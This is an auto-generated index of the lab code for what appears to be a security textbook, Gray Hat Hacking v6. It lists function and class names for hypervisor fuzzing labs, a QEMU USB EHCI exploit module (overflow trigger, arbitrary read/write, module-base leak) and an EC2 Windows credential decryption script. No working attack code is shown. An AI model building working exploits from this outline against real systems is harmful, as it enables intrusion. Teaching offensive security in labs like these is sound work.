FILE: ch25/labs/common.h
type __builtin_va_list (line 12) | typedef __builtin_va_list va_list;
FILE: ch25/labs/guest.py
class OpType (line 9) | class OpType(Enum):
class Guest (line 13) | class Guest:
method __init__ (line 16) | def __init__(self):
method __enter__ (line 22) | def __enter__(self):
method __exit__ (line 36) | def __exit__(self, type, value, traceback):
method _init_boot_info (line 39) | def _init_boot_info(self, symbols, mmap):
method messages (line 50) | def messages(self):
method op_write_data (line 60) | def op_write_data(self, data, address=None):
method op_write (line 71) | def op_write(self, code, address=None):
method op_exec (line 77) | def op_exec(self, address):
method op_commit (line 83) | def op_commit(self):
method execute (line 87) | def execute(self, code):
FILE: ch25/labs/hypercall.py
class Session (line 40) | class Session(session.Session):
method __init__ (line 45) | def __init__(self):
method HvCallPostMessage (line 48) | def HvCallPostMessage(self, ConnectionId, MessageType, payload):
method HvCallSignalEvent (line 70) | def HvCallSignalEvent(self, ConnectionId, FlagNumber):
method dump_hc_page (line 91) | def dump_hc_page(self):
method on_boot (line 112) | def on_boot(self, body):
FILE: ch25/labs/hyperv_guest.py
function wsclient (line 29) | def wsclient():
class PseudoProc (line 39) | class PseudoProc:
method __init__ (line 40) | def __init__(self):
method kill (line 46) | def kill(self):
class Guest (line 50) | class Guest(guest.Guest):
method __enter__ (line 54) | def __enter__(self):
method __exit__ (line 94) | def __exit__(self, type, value, traceback):
class GuestGen1 (line 108) | class GuestGen1(Guest):
class GuestGen2 (line 111) | class GuestGen2(Guest):
FILE: ch25/labs/main.c
function put_symbols (line 12) | static void put_symbols() {
function put_mmap (line 23) | static void put_mmap(const struct multiboot_tag_mmap *mmap) {
function put_mbi (line 38) | static void put_mbi(const void *mbi) {
function op_write (line 59) | static void op_write() {
function op_exec (line 70) | static void op_exec() {
function kmain (line 76) | void kmain(const void *mbi) {
FILE: ch25/labs/multiboot2.h
type multiboot_uint8_t (line 91) | typedef unsigned char multiboot_uint8_t;
type multiboot_uint16_t (line 92) | typedef unsigned short multiboot_uint16_t;
type multiboot_uint32_t (line 93) | typedef unsigned int multiboot_uint32_t;
type multiboot_uint64_t (line 94) | typedef unsigned long long multiboot_uint64_t;
type multiboot_header (line 96) | struct multiboot_header
type multiboot_header_tag (line 111) | struct multiboot_header_tag
type multiboot_header_tag_information_request (line 118) | struct multiboot_header_tag_information_request
type multiboot_header_tag_address (line 126) | struct multiboot_header_tag_address
type multiboot_header_tag_entry_address (line 137) | struct multiboot_header_tag_entry_address
type multiboot_header_tag_console_flags (line 145) | struct multiboot_header_tag_console_flags
type multiboot_header_tag_framebuffer (line 153) | struct multiboot_header_tag_framebuffer
type multiboot_header_tag_module_align (line 163) | struct multiboot_header_tag_module_align
type multiboot_header_tag_relocatable (line 170) | struct multiboot_header_tag_relocatable
type multiboot_color (line 181) | struct multiboot_color
type multiboot_mmap_entry (line 188) | struct multiboot_mmap_entry
type multiboot_memory_map_t (line 200) | typedef struct multiboot_mmap_entry multiboot_memory_map_t;
type multiboot_tag (line 202) | struct multiboot_tag
type multiboot_tag_string (line 208) | struct multiboot_tag_string
type multiboot_tag_module (line 215) | struct multiboot_tag_module
type multiboot_tag_basic_meminfo (line 224) | struct multiboot_tag_basic_meminfo
type multiboot_tag_bootdev (line 232) | struct multiboot_tag_bootdev
type multiboot_tag_mmap (line 241) | struct multiboot_tag_mmap
type multiboot_vbe_info_block (line 250) | struct multiboot_vbe_info_block
type multiboot_vbe_mode_info_block (line 255) | struct multiboot_vbe_mode_info_block
type multiboot_tag_vbe (line 260) | struct multiboot_tag_vbe
type multiboot_tag_framebuffer_common (line 274) | struct multiboot_tag_framebuffer_common
type multiboot_tag_framebuffer (line 291) | struct multiboot_tag_framebuffer
type multiboot_tag_elf_sections (line 314) | struct multiboot_tag_elf_sections
type multiboot_tag_apm (line 324) | struct multiboot_tag_apm
type multiboot_tag_efi32 (line 339) | struct multiboot_tag_efi32
type multiboot_tag_efi64 (line 346) | struct multiboot_tag_efi64
type multiboot_tag_smbios (line 353) | struct multiboot_tag_smbios
type multiboot_tag_old_acpi (line 363) | struct multiboot_tag_old_acpi
type multiboot_tag_new_acpi (line 370) | struct multiboot_tag_new_acpi
type multiboot_tag_network (line 377) | struct multiboot_tag_network
type multiboot_tag_efi_mmap (line 384) | struct multiboot_tag_efi_mmap
type multiboot_tag_efi32_ih (line 393) | struct multiboot_tag_efi32_ih
type multiboot_tag_efi64_ih (line 400) | struct multiboot_tag_efi64_ih
type multiboot_tag_load_base_addr (line 407) | struct multiboot_tag_load_base_addr
FILE: ch25/labs/pci.py
class PciHeader (line 216) | class PciHeader:
method __init__ (line 217) | def __init__(self, regs):
method info (line 232) | def info(self):
method get_header_type (line 249) | def get_header_type(self):
class StandardHeader (line 252) | class StandardHeader(PciHeader):
method __init__ (line 253) | def __init__(self, regs):
method reg_nums (line 265) | def reg_nums(self):
class Pci2Pci (line 268) | class Pci2Pci(PciHeader):
method __init__ (line 269) | def __init__(self, regs):
class Cardbus (line 292) | class Cardbus(PciHeader):
method __init__ (line 293) | def __init__(self, regs):
class Bar (line 317) | class Bar:
method __init__ (line 318) | def __init__(self, reg_num, reg, size, reg_high):
class Session (line 333) | class Session(session.Session):
method __init__ (line 338) | def __init__(self, guest_cls):
method scan_pci (line 343) | def scan_pci(self):
method inject_read_bar_code (line 412) | def inject_read_bar_code(self):
method scan_device (line 481) | def scan_device(self, bus, slot, func, regs):
method print_bar_info (line 521) | def print_bar_info(self, bar):
method print_dev_info (line 524) | def print_dev_info(self, bus, slot, func, dev):
method on_boot (line 534) | def on_boot(self, body):
FILE: ch25/labs/protocol.c
type msg_buffer (line 8) | struct msg_buffer {
type msg_buffer (line 13) | struct msg_buffer
type msg_buffer (line 14) | struct msg_buffer
type msg_buffer (line 15) | struct msg_buffer
function put_tp (line 32) | void put_tp(bool is_oob, TP prefix) {
function TP (line 37) | TP get_tp() {
function put_primitive (line 43) | void put_primitive(bool is_oob, TP prefix, const Primitive_t *value) {
function get_primitive (line 78) | void get_primitive(TP prefix, Primitive_t *value) {
function put_array (line 110) | void put_array(bool is_oob, const Array_t *array, const void *data) {
function get_array (line 120) | void get_array(Array_t *array, void **dst_ptr) {
function put_cstring (line 128) | void put_cstring(bool is_oob, const char *ptr) {
function _put_va (line 134) | static void _put_va(bool is_oob, TP prefix, va_list args) {
function _get_va (line 158) | static void _get_va(TP prefix, va_list args) {
function put_va (line 179) | void put_va(bool is_oob, ...) {
function get_va (line 187) | void get_va(TP prefix, ...) {
function send_msg (line 194) | void send_msg(MT msg_type) {
function msg_hdr_valid (line 208) | static bool msg_hdr_valid(const MsgHdr *hdr) {
function recv_msg (line 213) | void recv_msg() {
function _reset_oob_buffer (line 222) | void _reset_oob_buffer() {
FILE: ch25/labs/protocol.h
type MT (line 10) | typedef enum {
type MsgHdr (line 20) | typedef struct {
type TP (line 27) | typedef enum {
type Primitive_t (line 45) | typedef union {
type Array_t (line 56) | typedef struct {
type OOBType (line 61) | typedef enum {OOBPrint = UINT32_C(0), OOBAssert} OOBType;
type OpType (line 62) | typedef enum {OpWrite = UINT32_C(0), OpExec} OpType;
FILE: ch25/labs/protocol.py
function make_adapter (line 38) | def make_adapter(cInt, fInt):
class ArrayAdapter (line 46) | class ArrayAdapter(c.Adapter):
method _decode (line 47) | def _decode(self, obj, context, path):
method _encode (line 51) | def _encode(self, obj, context, path):
class ListAdapter (line 55) | class ListAdapter(c.Adapter):
method _decode (line 56) | def _decode(self, obj, context, path):
method _encode (line 65) | def _encode(self, obj, context, path):
class BodyAdapter (line 92) | class BodyAdapter(c.Adapter):
method _decode (line 93) | def _decode(self, obj, context, path):
method _encode (line 96) | def _encode(self, obj, context, path):
function recv (line 116) | def recv(reader):
function send (line 122) | def send(writer, body):
FILE: ch25/labs/remotemem.py
class RemoteMemoryError (line 8) | class RemoteMemoryError(Exception):
class RemoteMemory (line 11) | class RemoteMemory:
method __init__ (line 12) | def __init__(self):
method add_region (line 16) | def add_region(self, base, size):
method del_region (line 21) | def del_region(self, base, size):
method alloc (line 26) | def alloc(self, size):
method free (line 35) | def free(self, address):
method free_all (line 39) | def free_all(self):
class PageAlloc (line 44) | class PageAlloc:
method __init__ (line 45) | def __init__(self, mem, data_len):
method start (line 54) | def start(self):
method end (line 57) | def end(self):
method size (line 60) | def size(self):
method page_list (line 63) | def page_list(self):
method free (line 66) | def free(self):
class Chunk (line 71) | class Chunk:
method __init__ (line 72) | def __init__(self, data, offset=None):
method __eq__ (line 76) | def __eq__(self, other):
method __lt__ (line 79) | def __lt__(self, other):
class IOVector (line 83) | class IOVector:
method __init__ (line 84) | def __init__(self, chunk_list=None):
method size (line 91) | def size(self):
method append (line 98) | def append(self, data, offset=None):
method iter (line 104) | def iter(self):
FILE: ch25/labs/session.py
class OOBType (line 10) | class OOBType(Enum):
class Session (line 14) | class Session:
method __init__ (line 19) | def __init__(self, guest_cls=Guest):
method timeout_handler (line 28) | def timeout_handler(signum, frame):
method context_save (line 31) | def context_save(self):
method context_restore (line 36) | def context_restore(self):
method code (line 41) | def code(self, code):
method execute (line 44) | def execute(self, code):
method fuzz (line 47) | def fuzz(self, reply):
method on_boot (line 50) | def on_boot(self, body):
method install_idt (line 54) | def install_idt(self, vectors=30):
method make_vector_handler (line 69) | def make_vector_handler(self, vec):
method is_oob (line 105) | def is_oob(self, msg_type, body):
method is_boot (line 121) | def is_boot(self, msg_type):
method next_message (line 124) | def next_message(self):
method run (line 132) | def run(self):
method run_loop (line 145) | def run_loop(self):
FILE: ch25/labs/time_sync.py
class ICMessageType (line 20) | class ICMessageType(Enum):
class Session (line 78) | class Session(vmbus.Session):
method negotiate (line 79) | def negotiate(self, msg):
method on_boot (line 106) | def on_boot(self, body):
FILE: ch25/labs/vmbus.py
class VmbusChannelMessage (line 12) | class VmbusChannelMessage(Enum):
class UUIDAdapter (line 56) | class UUIDAdapter(c.Adapter):
method _decode (line 57) | def _decode(self, obj, context, path):
method _encode (line 60) | def _encode(self, obj, context, path):
function gpa_range (line 135) | def gpa_range(address, size):
function gpa_range_size (line 144) | def gpa_range_size(range_list):
class PacketType (line 195) | class PacketType(Enum):
class Session (line 222) | class Session(hypercall.Session):
method synic_init (line 225) | def synic_init(self):
method synic_read_simp (line 263) | def synic_read_simp(self, SINT):
method synic_poll_simp (line 301) | def synic_poll_simp(self, SINT):
method vmbus_handle_message (line 309) | def vmbus_handle_message(self, msg):
method vmbus_read_message (line 327) | def vmbus_read_message(self):
method vmbus_initiate_contact (line 330) | def vmbus_initiate_contact(self):
method vmbus_handle_version_response (line 350) | def vmbus_handle_version_response(self, msg):
method vmbus_request_offers (line 359) | def vmbus_request_offers(self):
method vmbus_handle_offer (line 371) | def vmbus_handle_offer(self, msg):
method vmbus_handle_offers_delivered (line 383) | def vmbus_handle_offers_delivered(self, msg):
method vmbus_create_gpadl (line 387) | def vmbus_create_gpadl(self, child_relid, address, size):
method vmbus_handle_gpadl_created (line 428) | def vmbus_handle_gpadl_created(self, msg):
method vmbus_open_channel (line 433) | def vmbus_open_channel(self, child_relid):
method vmbus_handle_open_result (line 453) | def vmbus_handle_open_result(self, msg):
method vmbus_device_open (line 457) | def vmbus_device_open(self, if_instance=None, if_type=None, ring_size=...
method vmbus_init (line 473) | def vmbus_init(self):
method ringbuffer_init (line 484) | def ringbuffer_init(self, child_relid, address, size, offset_pages):
method ringbuffer_write (line 499) | def ringbuffer_write(self, ring_buffer, data):
method get_connection_id (line 552) | def get_connection_id(self, child_relid):
method ringbuffer_send_packet (line 559) | def ringbuffer_send_packet(self, child_relid, packet_type, data, trans...
method ringbuffer_read (line 589) | def ringbuffer_read(self, ring_buffer, data_len, update_index=True):
method ringbuffer_recv_packet (line 646) | def ringbuffer_recv_packet(self, child_relid):
method on_boot (line 657) | def on_boot(self, body):
FILE: ch26/labs/code.py
class Code (line 8) | class Code:
method __init__ (line 9) | def __init__(self, code, sym):
method build (line 14) | def build(self, base_address):
FILE: ch26/labs/common.c
function outb (line 12) | static void outb(uint16_t port, uint8_t val) {
function inb (line 16) | static uint8_t inb(uint16_t port) {
function setup_serial (line 22) | void setup_serial() {
function write_serial (line 32) | void write_serial(const void *data, unsigned long len) {
function read_serial (line 42) | void read_serial(void *data, unsigned long len) {
function crc32 (line 53) | uint32_t crc32(const void *data, unsigned long len) {
function reset (line 63) | void reset() {
function __assert (line 77) | void __assert(const char *msg, const char *file, int line) {
FILE: ch26/labs/common.h
type __builtin_va_list (line 12) | typedef __builtin_va_list va_list;
FILE: ch26/labs/cstruct.py
class CStruct (line 8) | class CStruct(c.Struct):
method __init__ (line 9) | def __init__(self, *subcons):
FILE: ch26/labs/ehci.py
class Session (line 14) | class Session(pci.Session):
method qtd_token (line 18) | def qtd_token(transfer_bytes, pid):
method qtd_single (line 24) | def qtd_single(token, data=None):
method qh_single (line 48) | def qh_single(qh, qtd):
method port_reset (line 61) | def port_reset(self):
method async_sched_stop (line 70) | def async_sched_stop(self):
method async_sched_run (line 83) | def async_sched_run(self, qh):
method run_single (line 98) | def run_single(self, token, qtd_data):
method request (line 113) | def request(req_type, request, value, index, length):
method setup (line 128) | def setup(self, request):
method usb_in (line 135) | def usb_in(self, data_len):
method usb_out (line 150) | def usb_out(self, data: IOVector):
method desc_string (line 161) | def desc_string(self, index):
method ehci_regs_base (line 179) | def ehci_regs_base(self):
method on_boot (line 191) | def on_boot(self, body):
FILE: ch26/labs/guest.py
class OpType (line 9) | class OpType(Enum):
class Guest (line 13) | class Guest:
method __init__ (line 16) | def __init__(self):
method __enter__ (line 22) | def __enter__(self):
method __exit__ (line 36) | def __exit__(self, type, value, traceback):
method _init_boot_info (line 39) | def _init_boot_info(self, symbols, mmap):
method messages (line 50) | def messages(self):
method op_write_data (line 60) | def op_write_data(self, data, address=None):
method op_write (line 71) | def op_write(self, code, address=None):
method op_exec (line 77) | def op_exec(self, address):
method op_commit (line 83) | def op_commit(self):
method execute (line 87) | def execute(self, code):
FILE: ch26/labs/main.c
function put_symbols (line 12) | static void put_symbols() {
function put_mmap (line 23) | static void put_mmap(const struct multiboot_tag_mmap *mmap) {
function put_mbi (line 38) | static void put_mbi(const void *mbi) {
function op_write (line 59) | static void op_write() {
function op_exec (line 70) | static void op_exec() {
function kmain (line 76) | void kmain(const void *mbi) {
FILE: ch26/labs/multiboot2.h
type multiboot_uint8_t (line 91) | typedef unsigned char multiboot_uint8_t;
type multiboot_uint16_t (line 92) | typedef unsigned short multiboot_uint16_t;
type multiboot_uint32_t (line 93) | typedef unsigned int multiboot_uint32_t;
type multiboot_uint64_t (line 94) | typedef unsigned long long multiboot_uint64_t;
type multiboot_header (line 96) | struct multiboot_header
type multiboot_header_tag (line 111) | struct multiboot_header_tag
type multiboot_header_tag_information_request (line 118) | struct multiboot_header_tag_information_request
type multiboot_header_tag_address (line 126) | struct multiboot_header_tag_address
type multiboot_header_tag_entry_address (line 137) | struct multiboot_header_tag_entry_address
type multiboot_header_tag_console_flags (line 145) | struct multiboot_header_tag_console_flags
type multiboot_header_tag_framebuffer (line 153) | struct multiboot_header_tag_framebuffer
type multiboot_header_tag_module_align (line 163) | struct multiboot_header_tag_module_align
type multiboot_header_tag_relocatable (line 170) | struct multiboot_header_tag_relocatable
type multiboot_color (line 181) | struct multiboot_color
type multiboot_mmap_entry (line 188) | struct multiboot_mmap_entry
type multiboot_memory_map_t (line 200) | typedef struct multiboot_mmap_entry multiboot_memory_map_t;
type multiboot_tag (line 202) | struct multiboot_tag
type multiboot_tag_string (line 208) | struct multiboot_tag_string
type multiboot_tag_module (line 215) | struct multiboot_tag_module
type multiboot_tag_basic_meminfo (line 224) | struct multiboot_tag_basic_meminfo
type multiboot_tag_bootdev (line 232) | struct multiboot_tag_bootdev
type multiboot_tag_mmap (line 241) | struct multiboot_tag_mmap
type multiboot_vbe_info_block (line 250) | struct multiboot_vbe_info_block
type multiboot_vbe_mode_info_block (line 255) | struct multiboot_vbe_mode_info_block
type multiboot_tag_vbe (line 260) | struct multiboot_tag_vbe
type multiboot_tag_framebuffer_common (line 274) | struct multiboot_tag_framebuffer_common
type multiboot_tag_framebuffer (line 291) | struct multiboot_tag_framebuffer
type multiboot_tag_elf_sections (line 314) | struct multiboot_tag_elf_sections
type multiboot_tag_apm (line 324) | struct multiboot_tag_apm
type multiboot_tag_efi32 (line 339) | struct multiboot_tag_efi32
type multiboot_tag_efi64 (line 346) | struct multiboot_tag_efi64
type multiboot_tag_smbios (line 353) | struct multiboot_tag_smbios
type multiboot_tag_old_acpi (line 363) | struct multiboot_tag_old_acpi
type multiboot_tag_new_acpi (line 370) | struct multiboot_tag_new_acpi
type multiboot_tag_network (line 377) | struct multiboot_tag_network
type multiboot_tag_efi_mmap (line 384) | struct multiboot_tag_efi_mmap
type multiboot_tag_efi32_ih (line 393) | struct multiboot_tag_efi32_ih
type multiboot_tag_efi64_ih (line 400) | struct multiboot_tag_efi64_ih
type multiboot_tag_load_base_addr (line 407) | struct multiboot_tag_load_base_addr
FILE: ch26/labs/pci.py
class PciHeader (line 216) | class PciHeader:
method __init__ (line 217) | def __init__(self, regs):
method info (line 232) | def info(self):
method get_header_type (line 249) | def get_header_type(self):
class StandardHeader (line 252) | class StandardHeader(PciHeader):
method __init__ (line 253) | def __init__(self, regs):
method reg_nums (line 265) | def reg_nums(self):
class Pci2Pci (line 268) | class Pci2Pci(PciHeader):
method __init__ (line 269) | def __init__(self, regs):
class Cardbus (line 292) | class Cardbus(PciHeader):
method __init__ (line 293) | def __init__(self, regs):
class Bar (line 317) | class Bar:
method __init__ (line 318) | def __init__(self, reg_num, reg, size, reg_high):
class Session (line 333) | class Session(session.Session):
method __init__ (line 338) | def __init__(self, guest_cls):
method scan_pci (line 343) | def scan_pci(self):
method inject_read_bar_code (line 412) | def inject_read_bar_code(self):
method scan_device (line 481) | def scan_device(self, bus, slot, func, regs):
method print_bar_info (line 521) | def print_bar_info(self, bar):
method print_dev_info (line 524) | def print_dev_info(self, bus, slot, func, dev):
method on_boot (line 534) | def on_boot(self, body):
FILE: ch26/labs/protocol.c
type msg_buffer (line 8) | struct msg_buffer {
type msg_buffer (line 13) | struct msg_buffer
type msg_buffer (line 14) | struct msg_buffer
type msg_buffer (line 15) | struct msg_buffer
function put_tp (line 32) | void put_tp(bool is_oob, TP prefix) {
function TP (line 37) | TP get_tp() {
function put_primitive (line 43) | void put_primitive(bool is_oob, TP prefix, const Primitive_t *value) {
function get_primitive (line 78) | void get_primitive(TP prefix, Primitive_t *value) {
function put_array (line 110) | void put_array(bool is_oob, const Array_t *array, const void *data) {
function get_array (line 120) | void get_array(Array_t *array, void **dst_ptr) {
function put_cstring (line 128) | void put_cstring(bool is_oob, const char *ptr) {
function _put_va (line 134) | static void _put_va(bool is_oob, TP prefix, va_list args) {
function _get_va (line 158) | static void _get_va(TP prefix, va_list args) {
function put_va (line 179) | void put_va(bool is_oob, ...) {
function get_va (line 187) | void get_va(TP prefix, ...) {
function send_msg (line 194) | void send_msg(MT msg_type) {
function msg_hdr_valid (line 208) | static bool msg_hdr_valid(const MsgHdr *hdr) {
function recv_msg (line 213) | void recv_msg() {
function _reset_oob_buffer (line 222) | void _reset_oob_buffer() {
FILE: ch26/labs/protocol.h
type MT (line 10) | typedef enum {
type MsgHdr (line 20) | typedef struct {
type TP (line 27) | typedef enum {
type Primitive_t (line 45) | typedef union {
type Array_t (line 56) | typedef struct {
type OOBType (line 61) | typedef enum {OOBPrint = UINT32_C(0), OOBAssert} OOBType;
type OpType (line 62) | typedef enum {OpWrite = UINT32_C(0), OpExec} OpType;
FILE: ch26/labs/protocol.py
function make_adapter (line 38) | def make_adapter(cInt, fInt):
class ArrayAdapter (line 46) | class ArrayAdapter(c.Adapter):
method _decode (line 47) | def _decode(self, obj, context, path):
method _encode (line 51) | def _encode(self, obj, context, path):
class ListAdapter (line 55) | class ListAdapter(c.Adapter):
method _decode (line 56) | def _decode(self, obj, context, path):
method _encode (line 65) | def _encode(self, obj, context, path):
class BodyAdapter (line 92) | class BodyAdapter(c.Adapter):
method _decode (line 93) | def _decode(self, obj, context, path):
method _encode (line 96) | def _encode(self, obj, context, path):
function recv (line 116) | def recv(reader):
function send (line 122) | def send(writer, body):
FILE: ch26/labs/qemu_guest.py
class Guest (line 7) | class Guest(guest.Guest):
method __enter__ (line 11) | def __enter__(self):
FILE: ch26/labs/qemu_xpl.py
class ExploitError (line 157) | class ExploitError(Exception):
class Exploit (line 160) | class Exploit(ehci.Session):
method trigger_overflow (line 165) | def trigger_overflow(self, overflow_len, data):
method overflow_data (line 170) | def overflow_data(self):
method overflow_build (line 178) | def overflow_build(self, overflow_len, setup_len, setup_index):
method relative_write (line 186) | def relative_write(self, offset, data: IOVector):
method relative_read (line 196) | def relative_read(self, offset, length):
method addr_of (line 214) | def addr_of(self, field):
method arbitrary_read_near (line 217) | def arbitrary_read_near(self, addr, data_len):
method relative_write_2 (line 221) | def relative_write_2(self, offset, data, data_buf_contents):
method arbitrary_write (line 234) | def arbitrary_write(self, addr, data, data_buf_contents):
method descr_build (line 238) | def descr_build(self, address_list, start_addr):
method leak_multiple (line 254) | def leak_multiple(self, address_list):
method leak_module_base (line 264) | def leak_module_base(self, fptr):
method leak_one (line 280) | def leak_one(self, addr):
method on_boot (line 284) | def on_boot(self, body):
FILE: ch26/labs/remotemem.py
class RemoteMemoryError (line 8) | class RemoteMemoryError(Exception):
class RemoteMemory (line 11) | class RemoteMemory:
method __init__ (line 12) | def __init__(self):
method add_region (line 16) | def add_region(self, base, size):
method del_region (line 21) | def del_region(self, base, size):
method alloc (line 26) | def alloc(self, size):
method free (line 35) | def free(self, address):
method free_all (line 39) | def free_all(self):
class PageAlloc (line 44) | class PageAlloc:
method __init__ (line 45) | def __init__(self, mem, data_len):
method start (line 54) | def start(self):
method end (line 57) | def end(self):
method size (line 60) | def size(self):
method page_list (line 63) | def page_list(self):
method free (line 66) | def free(self):
class Chunk (line 71) | class Chunk:
method __init__ (line 72) | def __init__(self, data, offset=None):
method __eq__ (line 76) | def __eq__(self, other):
method __lt__ (line 79) | def __lt__(self, other):
class IOVector (line 83) | class IOVector:
method __init__ (line 84) | def __init__(self, chunk_list=None):
method size (line 91) | def size(self):
method append (line 98) | def append(self, data, offset=None):
method iter (line 104) | def iter(self):
FILE: ch26/labs/session.py
class OOBType (line 10) | class OOBType(Enum):
class Session (line 14) | class Session:
method __init__ (line 19) | def __init__(self, guest_cls=Guest):
method timeout_handler (line 28) | def timeout_handler(signum, frame):
method context_save (line 31) | def context_save(self):
method context_restore (line 36) | def context_restore(self):
method code (line 41) | def code(self, code):
method execute (line 44) | def execute(self, code):
method fuzz (line 47) | def fuzz(self, reply):
method on_boot (line 50) | def on_boot(self, body):
method install_idt (line 54) | def install_idt(self, vectors=30):
method make_vector_handler (line 69) | def make_vector_handler(self, vec):
method is_oob (line 105) | def is_oob(self, msg_type, body):
method is_boot (line 121) | def is_boot(self, msg_type):
method next_message (line 124) | def next_message(self):
method run (line 132) | def run(self):
method run_loop (line 145) | def run_loop(self):
FILE: ch26/labs/trigger.py
class Trigger (line 8) | class Trigger(ehci.Session):
method trigger_overflow (line 12) | def trigger_overflow(self, overflow_len, data):
method on_boot (line 17) | def on_boot(self, body):
FILE: ch27/lab/ansible/roles/kali_customizations/files/getEC2WinCreds.py
function decrypt (line 28) | def decrypt(ciphertext, keyfile=args.keyfile):
function get_ec2_info (line 50) | def get_ec2_info():
FILE: ch29/Lab/targets/web/app.py
function get_hit_count (line 14) | def get_hit_count():
function enter (line 26) | def enter():
Condensed preview — 500 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (3,644K chars).
[
{
"path": ".gitignore",
"chars": 81,
"preview": "*.tfstate*\n**/.terraform.lock.hcl\n*.tvars\n**/.terraform\n*.DS_Store\n**/*.DS_Store\n"
},
{
"path": "CloudSetup/README.md",
"chars": 4025,
"preview": "The following instructions are for all AWS labs in this book. There are separate instructions for Azure, inside Chapter"
},
{
"path": "CloudSetup/build-images.sh",
"chars": 271,
"preview": "#!/bin/bash\nPACKER=/usr/bin/packer\nif [ -f ~/.local/bin/packer ] ; then \n\tPACKER=~/.local/bin/packer\nfi\ncd kali-base\n$P"
},
{
"path": "CloudSetup/delete-old-images.sh",
"chars": 901,
"preview": "#!/bin/bash\nRED='\\033[0;31m'\nWHITE='\\033[0;37m'\nGREEN='\\033[0;32m'\nNC='\\033[0m' # No Color\n\nimagelist=(ghh-server2016 gh"
},
{
"path": "CloudSetup/delete-orphaned-snaps.sh",
"chars": 837,
"preview": "#!/bin/bash\nRED='\\033[0;31m'\nWHITE='\\033[0;37m'\nGREEN='\\033[0;32m'\nNC='\\033[0m' # No Color\n\nprintf \"${WHITE}[*] Retrievi"
},
{
"path": "CloudSetup/deprovision.sh",
"chars": 1160,
"preview": "#!/bin/bash\n\nAWS=`which aws`\nJQ=`which jq`\n\nif ! test -f \"$AWS\"; then\n\techo \"AWS cli is required for execution, please i"
},
{
"path": "CloudSetup/eksall.template",
"chars": 666,
"preview": "{\n \"Version\": \"2012-10-17\",\n \"Statement\": [\n {\n \"Effect\": \"Allow\",\n \"Action\": \"eks:*\""
},
{
"path": "CloudSetup/find-orphaned-snaps.sh",
"chars": 749,
"preview": "#!/bin/bash\nRED='\\033[0;31m'\nWHITE='\\033[0;37m'\nGREEN='\\033[0;32m'\nNC='\\033[0m' # No Color\n\nprintf \"${WHITE}[*] Retrievi"
},
{
"path": "CloudSetup/install-cloud-tools.sh",
"chars": 699,
"preview": "#!/bin/bash\n\n#Kali VMWare Image doesn't have pip3\n\necho \"[+] Installing Python3 pip\"\nsudo apt install python3-pip -y\n\nec"
},
{
"path": "CloudSetup/kali-base/config.sh",
"chars": 1013,
"preview": "#!/bin/bash\n\nexport DEBIAN_FRONTEND=noninteractive\nERRORS=0\napt-get update && apt-get -y upgrade\napt-get -y dist-upgrade"
},
{
"path": "CloudSetup/kali-base/kali.hcl",
"chars": 1508,
"preview": "data \"amazon-ami\" \"ghh_kali\" {\n filters = {\n name = \"debian-10-amd64*\"\n root-device-type = \"ebs"
},
{
"path": "CloudSetup/provision.sh",
"chars": 1891,
"preview": "#!/bin/bash\n\nAWS=`which aws`\nJQ=`which jq`\nif ! test -f \"$AWS\"; then\n\techo \"AWS cli is required for execution, please in"
},
{
"path": "CloudSetup/server-2016-base/bootstrap.ps1",
"chars": 1476,
"preview": "\nWrite-Host \"Disabling Telemetry...\"\nSet-ItemProperty -Path \"HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Da"
},
{
"path": "CloudSetup/server-2016-base/server2016_template.json",
"chars": 1629,
"preview": "{\n \"variables\": {\n \"name\": \"ghh-server2016-{{timestamp}}\",\n \"aws_region\": \"us-east-1\",\n \"aws_ins"
},
{
"path": "CloudSetup/server-2016-base/user_data.ps1",
"chars": 1434,
"preview": "<powershell>\n\nwrite-output \"Running User Data Script\"\nwrite-host \"(host) Running User Data Script\"\n\nSet-ExecutionPolicy "
},
{
"path": "CloudSetup/server-2019-base/bootstrap.ps1",
"chars": 1476,
"preview": "\nWrite-Host \"Disabling Telemetry...\"\nSet-ItemProperty -Path \"HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Da"
},
{
"path": "CloudSetup/server-2019-base/server2019_template.json",
"chars": 1629,
"preview": "{\n \"variables\": {\n \"name\": \"ghh-server2019-{{timestamp}}\",\n \"aws_region\": \"us-east-1\",\n \"aws_ins"
},
{
"path": "CloudSetup/server-2019-base/user_data.ps1",
"chars": 1434,
"preview": "<powershell>\n\nwrite-output \"Running User Data Script\"\nwrite-host \"(host) Running User Data Script\"\n\nSet-ExecutionPolicy "
},
{
"path": "README.md",
"chars": 28,
"preview": "# GHHv6\nGray Hat Hacking v6\n"
},
{
"path": "ch02/client.py",
"chars": 241,
"preview": "#client.py\nimport socket\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect(('localhost', 4242))\ns.send(b'S"
},
{
"path": "ch02/fmt_str.c",
"chars": 157,
"preview": "#include <stdio.h>\n\nint main(void){\n double x = 23.5644;\n printf(\"The value of x is %5.2f\\n\", x);\n printf(\"The value "
},
{
"path": "ch02/hello.asm",
"chars": 1175,
"preview": "section .data ; section declaration\nmsg db \"Hello, haxor!\",0xa ; our string with a carriage retur"
},
{
"path": "ch02/hello.c",
"chars": 275,
"preview": "// hello.c // customary comment of program name\n#include <stdio.h> // needed for screen prin"
},
{
"path": "ch02/ifelse.c",
"chars": 218,
"preview": "#include <stdio.h>\n\nint main(void){\n int x = 0;\n while(1){\n if (x == 0) {\n printf(\"x = %d\\n\", x);\n x++;\n "
},
{
"path": "ch02/meet.c",
"chars": 658,
"preview": "// meet.c\n#include <stdio.h> // needed for screen printing\n#include <string.h> // needed for strcpy\nvoid "
},
{
"path": "ch02/memory.c",
"chars": 898,
"preview": "// memory.c\n#include <stdlib.h>\n#include <string.h>\n/* memory.c */ // this comment simply holds the program name\n"
},
{
"path": "ch02/targets",
"chars": 78,
"preview": "RPC-DCOM 10.10.20.1,10.10.20.4\nSQL-SA-blank-pw 10.10.20.27,10.10.20.28\n"
},
{
"path": "ch02/while_ex.c",
"chars": 121,
"preview": "#include <stdio.h>\n\nint main(void){\n int x = 0;\n\n while (x<10) {\n printf(\"x = %d\\n\", x);\n x++;\n }\n return 0;\n}"
},
{
"path": "ch03/heapme_demo.c",
"chars": 359,
"preview": "//heapme_demo.c\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n\nvoid *x[8];\n\nint main() "
},
{
"path": "ch03/hello.c",
"chars": 207,
